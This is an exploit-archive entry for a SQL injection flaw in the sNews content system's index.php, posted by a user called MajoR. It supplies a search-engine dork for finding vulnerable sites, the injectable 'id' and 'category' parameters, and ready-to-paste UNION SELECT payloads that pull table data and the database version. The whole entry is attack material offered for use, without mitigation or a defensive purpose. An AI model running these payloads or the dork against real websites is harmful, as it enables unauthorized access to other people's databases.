sNews (index.php) SQL Injection Vulnerability

2010-07-24T00:00:00
ID 1337DAY-ID-13461
Type zdt
Reporter MajoR
Modified 2010-07-24T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =============================================
sNews (index.php) SQL Injection Vulnerability
=============================================


# Author: MajoR
 
# Software Link: http://snews.awddesign.co.uk
 
# Version: N/A
 
# Tested on: Wnidows xp SP2
 
# CVE : N/A
 
 
 
====================================================sNews (index.php) SQL Injection Vulnerability
===================================================
 
Author :   MajoR
Email  : [email protected]
 
Dork: "Powered by sNews"
 
===================================================
 
 
[+] Vulnerable File :
 
http://www.Victime.com/sNews/index.php?id=
 
[+] ExploiT :
 
 
-82/**/union/**/select/**/1,concat%28published,0x3a,name%29,3,4,5,6,7,8,9,10,11+from+categories--
 

 
http://localhost/[path]/index.php?category=-3 union select 0,version(),2,3,4,5,6,7,8


====================================================
 
 
Greetingz To SlaSSi & Xella



#  0day.today [2018-01-01]  #